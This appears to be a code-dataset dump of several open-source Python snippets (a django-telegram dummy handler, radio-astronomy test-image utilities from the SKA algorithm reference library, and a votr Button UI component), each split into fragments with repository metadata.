_readOnlyAttrs = filter(lambda k,m=_writeComputedAttrs: not m.has_key(k),
HTMLElement._readOnlyAttrs + _readComputedAttrs.keys())
|
aquametalabs/django-telegram
|
telegram/handlers/dummy.py
|
Python
|
bsd-3-clause
| 387
| 0
|
fr
|
om telegram.handlers.base import BasePlatformHandler
class DummyHandler(BasePlatformHandler):
def handle(self):
print 'Channel: %s' % self.telegram.channel.name
print 'Subject: %s' % self.telegram.subject
print 'Message: %s' % self.telegram.content
print 'Level: %s' % self.subscription.get
|
_level_display()
print 'Extra: %s' % self.extra
|
SKA-ScienceDataProcessor/algorithm-reference-library
|
processing_components/simulation/testing_support.py
|
Python
|
apache-2.0
| 47,842
| 0.007504
|
"""
Functions that aid testing in various ways. A typical use would be::
lowcore = create_named_configuration('LOWBD2-CORE')
times = numpy.linspace(-3, +3, 13) * (numpy.pi / 12.0)
frequency = numpy.array([1e8])
channel_bandwidth = numpy.array([1e7])
# Define the component and give it some polarisation and spectral behaviour
f = numpy.array([100.0])
flux = numpy.array([f])
phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')
compabsdirection = SkyCoord(ra=17.0 * u.deg, dec=-36.5 * u.deg, frame='icrs', equinox='J2000')
comp = create_skycomponent(flux=flux, frequency=frequency, direction=compabsdirection,
polarisation_frame=PolarisationFrame('stokesI'))
image = create_test_image(frequency=frequency, phasecentre=phasecentre,
cellsize=0.001,
polarisation_frame=PolarisationFrame('stokesI')
vis = create_visibility(lowcore, times=times, frequency=frequency,
channel_bandwidth=channel_bandwidth,
phasecentre=phasecentre, weight=1,
polarisation_frame=PolarisationFrame('stokesI'),
integration_time=1.0)
"""
import csv
import logging
from typing import List
import astropy.units as u
import numpy
from astropy.coordinates import SkyCoord
from astropy.io import fits
from astropy.wcs import WCS
from astropy.wcs.utils import pixel_to_skycoord
from scipy import interpolate
from data_models.memory_data_models import Configuration, Image, GainTable, Skycomponent, SkyModel, PointingTable
from data_models.parameters import arl_path
from data_models.polarisation import PolarisationFrame
from processing_components.calibration.calibration_control import create_calibration_controls
from processing_components.calibration.operations import create_gaintable_from_blockvisibility, apply_gaintable
from processing_components.image.operations import import_image_from_fits
from processing_components.imaging.base import predict_2d, predict_skycomponent_visibility, \
create_image_from_visibility, advise_wide_field
from processing_components.imaging.primary_beams import create_pb
from processing_components.skycomponent.operations import create_skycomponent, insert_skycomponent, \
apply_beam_to_skycomponent, filter_skycomponents_by_flux
from processing_components.visibility.base import create_blockvisibility, create_visibility
from processing_components.visibility.coalesce import convert_blockvisibility_to_visibility, \
convert_visibility_to_blockvisibility
from processing_library.image.operations import create_image_from_array
log = logging.getLogger(__name__)
def create_test_image(canonical=True, cellsize=None, frequency=None, channel_bandwidth=None,
phasecentre=None, polarisation_frame=PolarisationFrame("stokesI")) -> Image:
"""Create a useful test image
This is the test image M31 widely used in ALMA and other simulations. It is actually part of an Halpha region in
M31.
:param canonical: Make the image into a 4 dimensional image
:param cellsize:
:param frequency: Frequency (array) in Hz
:param channel_bandwidth: Channel bandwidth (a
|
rray) in Hz
:param phasecentre: Phase centre of image (SkyCoord)
:param polarisation_frame: Polarisation frame
:return: Image
"""
if frequency is None:
frequency = [1e8]
im = import_image_from_fits(arl_path("data/models/M31.MOD"))
if canonical:
if polarisation_frame is None:
im.polarisation_frame = PolarisationFrame("stokesI"
|
)
elif isinstance(polarisation_frame, PolarisationFrame):
im.polarisation_frame = polarisation_frame
else:
raise ValueError("polarisation_frame is not valid")
im = replicate_image(im, frequency=frequency, polarisation_frame=im.polarisation_frame)
if cellsize is not None:
im.wcs.wcs.cdelt[0] = -180.0 * cellsize / numpy.pi
im.wcs.wcs.cdelt[1] = +180.0 * cellsize / numpy.pi
if frequency is not None:
im.wcs.wcs.crval[3] = frequency[0]
if channel_bandwidth is not None:
im.wcs.wcs.cdelt[3] = channel_bandwidth[0]
else:
if len(frequency) > 1:
im.wcs.wcs.cdelt[3] = frequency[1] - frequency[0]
else:
im.wcs.wcs.cdelt[3] = 0.001 * frequency[0]
im.wcs.wcs.radesys = 'ICRS'
im.wcs.wcs.equinox = 2000.00
if phasecentre is not None:
im.wcs.wcs.crval[0] = phasecentre.ra.deg
im.wcs.wcs.crval[1] = phasecentre.dec.deg
# WCS is 1 relative
im.wcs.wcs.crpix[0] = im.data.shape[3] // 2 + 1
im.wcs.wcs.crpix[1] = im.data.shape[2] // 2 + 1
return im
def create_test_image_from_s3(npixel=16384, polarisation_frame=PolarisationFrame("stokesI"), cellsize=0.000015,
frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]),
phasecentre=None, fov=20, flux_limit=1e-3) -> Image:
"""Create MID test image from S3
The input catalog was generated at http://s-cubed.physics.ox.ac.uk/s3_sex using the following query::
Database: s3_sex
SQL: select * from Galaxies where (pow(10,itot_151)*1000 > 1.0) and (right_ascension between -5 and 5) and (declination between -5 and 5);;
Number of rows returned: 29966
For frequencies < 610MHz, there are three tables to use::
data/models/S3_151MHz_10deg.csv, use fov=10
data/models/S3_151MHz_20deg.csv, use fov=20
data/models/S3_151MHz_40deg.csv, use fov=40
For frequencies > 610MHz, there are three tables:
data/models/S3_1400MHz_1mJy_10deg.csv, use flux_limit>= 1e-3
data/models/S3_1400MHz_100uJy_10deg.csv, use flux_limit < 1e-3
data/models/S3_1400MHz_1mJy_18deg.csv, use flux_limit>= 1e-3
data/models/S3_1400MHz_100uJy_18deg.csv, use flux_limit < 1e-3
The component spectral index is calculated from the 610MHz and 151MHz or 1400MHz and 610MHz, and then calculated
for the specified frequencies.
If polarisation_frame is not stokesI then the image will a polarised axis but the values will be zero.
:param npixel: Number of pixels
:param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI"))
:param cellsize: cellsize in radians
:param frequency:
:param channel_bandwidth: Channel width (Hz)
:param phasecentre: phasecentre (SkyCoord)
:param fov: fov 10 | 20 | 40
:param flux_limit: Minimum flux (Jy)
:return: Image
"""
ras = []
decs = []
fluxes = []
if phasecentre is None:
phasecentre = SkyCoord(ra=+180.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000')
if polarisation_frame is None:
polarisation_frame = PolarisationFrame("stokesI")
npol = polarisation_frame.npol
nchan = len(frequency)
shape = [nchan, npol, npixel, npixel]
w = WCS(naxis=4)
# The negation in the longitude is needed by definition of RA, DEC
w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]]
w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0]
w.wcs.ctype = ["RA---SIN", "DEC--SIN", 'STOKES', 'FREQ']
w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]]
w.naxis = 4
w.wcs.radesys = 'ICRS'
w.wcs.equinox = 2000.0
model = create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame)
if numpy.max(frequency) > 6.1E8:
if fov > 10:
fovstr = '18'
else:
fovstr = '10'
if flux_limit >= 1e-3:
csvfilename = arl_path('data/models/S3_1400MHz_1mJy_%sdeg.csv' % fovstr)
else:
|
fmfi-svt/votr
|
aisikl/components/button.py
|
Python
|
apache-2.0
| 1,203
| 0.002494
|
from aisikl.events import action_event
from .actionablecontrol import ActionableControl
class Button(ActionableControl):
def __init__(self, dialog, id, type, parent_id, properties, element):
super().__init__(dialog, id, type, parent_id, properties, element)
self.image = properties.get('img')
self.confirm_question = element.get('confirmquestion')
self.access_key = element.get('accesskey')
if isinstance(self.access_key, list):
se
|
lf.access_key = ' '.join(self.
|
access_key) # BeautifulSoup :(
def _ais_setAccessKey(self, value):
self.access_key = value
def _ais_setImage(self, value):
self.image = value
def _ais_setConfirmQuestion(self, value):
self.confirm_question = value
def click(self):
self.log('action', 'Clicking {}'.format(self.id))
if self.try_execute_action(): return
ev = action_event(self, None, self.id)
# TODO: We should technically ask confirm_question before firing
# (if ev.listening is True), but we probably don't care.
self.dialog.app.send_events(ev)
# Note that showPopupMenus() is unsupported. Use menu items directly.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.